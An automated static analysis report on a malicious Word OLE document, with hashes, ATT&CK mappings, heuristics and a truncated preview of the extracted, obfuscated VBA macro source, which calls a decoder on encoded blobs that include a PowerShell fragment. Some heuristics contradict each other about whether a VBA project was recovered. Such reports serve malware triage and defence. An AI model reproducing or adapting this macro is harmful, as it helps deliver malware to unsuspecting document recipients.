Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec3a0b0af738ad38…

MALICIOUS

Office (OLE)

Size: 136.5 KB
Created: 2018-03-27 05:05:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: d489cf7e7173bceed7e1f82edab44a1f
SHA-1: 75c2c0a356df798df730cfbcd95531caf2e07595
SHA-256: ec3a0b0af738ad38a0001d76cb9b4edb204a3aff34a89a0f00872e534e25c158
Risk score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function, indicative of an AutoRun macro. The macro utilizes CreateObject and appears to be obfuscated, with calls to a function named 'zzIXdi' that likely decodes a URL or payload. The presence of a password-protected archive lure heuristic suggests the document is designed to trick the user into providing a password to decrypt a malicious payload, which is then likely executed by the macro.

Heuristics (8)

  • OLE document has large unaccounted-for region (severity: high; OLE_SLACK_ANOMALY)
    OLE file is 139,776 bytes but its declared streams total only 34,032 bytes; 105,744 bytes (76%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff (severity: high; SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning.
  • VBA macros detected (severity: medium; 2 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code.
  • AutoOpen macro (severity: high; OLE_VBA_AUTOOPEN)
    Macro contains an AutoOpen entry point, so it runs when the document is opened.
  • CreateObject call (severity: high; OLE_VBA_CREATEOBJ)
    Macro calls CreateObject, a common way to instantiate COM objects (shell, scripting, network) from VBA.
  • Legacy WordBasic auto-exec macro marker (severity: medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info; EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28817 bytes
SHA-256: cfee77e15d78fcd126e22a874af4bdb8a28e162b039ec24050fd69a5e0accd93
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 26 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "YVdNdKnW"
Function vTpujOlEJrMMD()
On Error Resume Next
Set GoBCP = EEANlu
iVztjJ = 76056 + 99495
wdIvD = 92138 / NbULVk
TSwwnWCp = zzIXdi("nODUAOQBmADYAMgA3ADMAYwAyADQANAAxADkAOQA0ADkAZQBkAGUAZQBiADUAMwBmADYAMQA2AGYAMgA5ADMAMgBmADMAMgAzAGYANAAyAGYAMwBjAGQAYwBkAGMANATvwNi", 3, 125)
Set UtpwI = uUJNrl
pYftiZ = 12103 + 80042
uThIR = 73607 / QiPtDd
Set uDYIb = iaRnX
DQfioo = 56391 + 65618
jzjtmI = 81178 / QsfNlz
YsjiDRRGhjs = zzIXdi("Zjj3ADgANwA4AGEANAA2AGQAZQBhAGUAMwA4AGUAYwAyAGUAMQBmADIAYQAxAGYAZgAxADkAMABjADcAYgA5ADEANAAyADUcLoq%p", 4, 92)
Set sSzMH = qEBcaA
SRMWc = 56464 + 27969
sPpCo = 52940 / vskRR
Set BJEjY = DmDjQ
Sluat = 99132 + 6042
mdqzt = 9517 / isaZU
HEAfBTBRv = zzIXdi("dEw5wHAMwAyADMAMgAxADcAMgBhADEAZgBmADMANgBiAGEAZABjAGUAOABmADIANQA4Aq0i", 7, 62)
Set rBGfPl = nDOzr
NPouiD = 42371 + 25661
XSGpT = 77104 / udGvY
Set iqAiL = HzXkb
dwsic = 16174 + 61097
pbVDuz = 73971 / kTKkn
NKpLaR = zzIXdi("X%whAGYAOABhADcAMgA1ADkAYgA1ADcAZgBiAGYAOAA1ADYAZAAxADkAYwA2AGMAOQAwAGQAYwA2ADUAYgAyADMAZgBjADIAOQBmADgAZQBhADIAZQA0ADgAOAA0ADAANQBmAGYANwBmADgAYQBiADAAot2J", 4, 149)
Set ZGDjOY = LwVAnU
ndGipj = 68687 + 6681
wjLSC = 27911 / ZrNfX
Set MHIzQN = XdBpA
MRWZwZ = 25254 + 96600
zYkQzv = 78681 / VzqJj
OJdzRXHLU = zzIXdi("pMNmGUAYQBkADMANQBjAGUAMQBjADkAMQAwADEAMQAwAGEAYwAzADEANQA3AGUANABhADAAZgA5AGQANQA2AGIAMAAyAGMANQAyAGUAMAA3ADUAZgBmAGMAYQBkADEAYQBhADYAMwA0AOw", 5, 136)
Set JDlKi = XwrnF
PUoRjo = 79583 + 59160
jMzOY = 65779 / jsKoc
Set twJkiY = wAOXYm
VwjZU = 77643 + 55177
cQUYSv = 92773 / IAddmL
CYmidNd = zzIXdi("Xfp2A5AGQAYgBmADIAMgBhADIAZQAyADMAYwAxAGMANwBjADcAMQA1AGEAZgBhADEAMQAwADMAYgBmADUAYgAyAGEANwBlAGMANgA0ADcAMAA1ADcAZQBhADEAOABhADAANwAyADEAZQBjADEANAAyAGYAMABkADMAYQA5AGMAYQBjAGIAMgA2AGIAYQBmAYaz", 5, 187)
Set mqNDf = OWczQ
wiJsTW = 87163 + 39318
QKFjzT = 11026 / uJjJl
Set niiCk = mzXsRZ
UHhBBO = 97622 + 71774
NMhrJU = 14181 / waFuan
lJrVOhN = zzIXdi("jQNgBkAGUANgA2ADIAZQA2ADIAYwA3AGEAYQA3ADMAZQAwADMAYQA4ADcAMQAyADUAMQBkADQAZAA5ADk8KbK", 3, 79)
Set CLNwV = uqzkGa
iSizTK = 34143 + 34894
tnSpp = 89125 / UsuUjz
Set IzDlzS = hGSQDE
SQiZiY = 85436 + 68896
ZLoCti = 56353 / XsmKl
ihkMA = zzIXdi("7ABhADgAYgA5AGYAZQAwAGEAOAA5AGQAOAAxADQAYgA2ADMAYgBmAGUAMwBjADQAMwBlADYANwAxAGUAZgAyADIANgBlADAANwAzADUAMAAwAGQAZAA1ADgAYQA5ADgAMgBkADQAOABmAGMAOQBlADQANwAzADAAZgBlAGIANAA0ADAAMgBiA3 0CSA", 2, 180)
Set fXkmKh = AzGfF
nMLGwY = 21740 + 58849
KQhCdG = 84954 / RUjTC
Set pkaNz = McQNb
OmTjo = 77101 + 45236
qtjhc = 56731 / QhGAUd
UnwwF = zzIXdi("aDEANQA0AGMANQA2ADAAZQAyAGYAZQBjADkAOABhAGUAZABjAGIANAA1ADcANgAxADIAMgBkADQAOQA0ADUAOQAxADYAOQAxADAAMgAwAGMAZgBhAGMANgA2AGYAYQA4ADYAZQAxADgAYQBiADkAYgA2ADcAMABhADYAMQA0AD,lL@P", 2, 169)
Set IFDSbi = nFjkwQ
XPdmr = 51028 + 40430
BtlVhw = 90958 / MHoXd
Set DFGOaz = iOOUwW
YANUUQ = 44734 + 11427
Pbmpp = 37082 / LLEpwK
FLvvIwF = zzIXdi("%M3DgANgA1ADYAZQBkADYAMQAwAGEAYgA5AGEANwA5ADgAZQBiADUAMABiAGYAZAA2AGMAYwBmADcAOmsMv", 4, 76)
Set HMJBA = dOVwcD
VzTJZz = 81314 + 82842
oIvPUD = 17999 / hsNwFH
Set VoXFw = jjocA
vwfIwn = 30453 + 16664
uCiUMj = 76068 / jADfd
criKITKVF = zzIXdi("MnUGQAOQBiADUAYwA4AGEAMQAwAGIAMQA0ADAANQAyADUAYwA1ADUAZQBmAGEANwAxADMAYgBmAGMANAB2UfM", 4, 78)
Set wMEKj = cHBWiA
cLmKw = 6063 + 45851
mtkkZt = 23321 / bwNSh
Set XhVCN = Pmnhj
bTmTf = 76543 + 83434
CLDfu = 63077 / EMiCC
Whitj = zzIXdi("wj5R([RunTImE.IntEROpsERVICES.MaRsHAL]::([rUntiMe.inTEROPsERViCEjiV1J", 5, 60)
Set qCwDA = ijzmA
IlzJic = 3934 + 82780
wLdpIh = 12191 / aIfjF
Set EtUVum = cYpiZ
FzRJh = 81378 + 26194
sqwor = 96028 / mzHnSw
thENAuOMwi = zzIXdi("57RpRkEAZQBjADcAZQA4ADIANQA2ADgANAAyADMAMwBmADIAYgA1ADQAOABhADQAYwAzADkAMABlAGUANAAxAGYAYwBlAGQANQBmADkAZgBmADEAMABlADgAZABiA,ip", 7, 119)
Set dhSzB = BVtMJl
dtwqqw = 58009 + 23614
VjCoQ = 80914 / huGLk
Set TTbkA = aNbuTP
XPlzWb = 79934 + 15766
VOYRG = 98930 / XIEwo
RvWWRjfJAYE = zzIXdi("0oAOAA1AGIAMgBiAGYAMQBjADMAMwAwADMAMgA0ADYAOABkAGIANQAwAGYAMwA2ADkAYwBmADkAMg6QLo", 3, 75)
Set ZwVlm = rwqBN
uowzlS = 98322 + 93583
zNLjh = 51570 / DlOQsP
Set HljYLR = KfFTlB
Q
... (truncated)